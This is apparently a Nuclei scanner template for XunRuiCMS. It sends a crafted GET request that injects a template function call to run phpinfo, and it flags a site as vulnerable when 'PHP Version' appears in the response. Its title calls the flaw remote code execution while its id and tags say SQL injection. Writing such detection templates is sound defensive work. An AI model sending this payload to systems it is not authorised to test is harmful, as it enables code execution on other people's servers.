id: xunrui-cms-sqli

info:
  name: 迅睿CMS框架远程代码执行漏洞
  author: Str1am
  severity: high
  tags: xunrui,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=phpinfo%20param0=-1"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "PHP Version"
        part: body
        condition: and